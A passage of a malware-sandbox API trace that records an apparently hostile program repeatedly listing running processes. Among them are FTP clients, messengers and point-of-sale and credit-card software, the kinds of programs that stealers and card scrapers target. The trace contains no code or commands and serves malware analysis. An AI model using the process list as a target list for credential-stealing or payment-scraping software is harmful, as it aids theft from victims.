lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0281.982] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0281.984] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0281.985] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0281.987] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0281.989] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0281.990] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0281.992] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0281.993] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0281.995] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0281.996] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0281.998] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0281.999] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0282.001] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0282.002] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0282.004] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0282.005] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0282.007] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0282.008] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0282.010] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0282.011] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0282.012] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0282.014] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0282.015] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.017] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.018] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0282.019] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.021] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0282.022] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0282.023] CloseHandle (hObject=0x2170) returned 1 [0282.023] Sleep (dwMilliseconds=0x64) [0282.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0282.225] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.227] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.229] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.234] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.236] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.238] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.240] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.242] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.244] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.246] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.325] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.327] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.329] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.331] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.333] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.335] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.337] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.339] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.345] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.347] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.349] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0282.351] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0282.353] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.354] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.360] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0282.362] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0282.364] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0282.366] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.368] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.370] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.426] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.429] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.431] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0282.433] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0282.438] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0282.440] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0282.441] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0282.443] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0282.445] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0282.447] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0282.450] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0282.455] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0282.457] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0282.459] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0282.460] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0282.462] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0282.464] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0282.521] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0282.523] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0282.525] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0282.531] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0282.533] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0282.534] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0282.536] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0282.538] Process32Next (in: 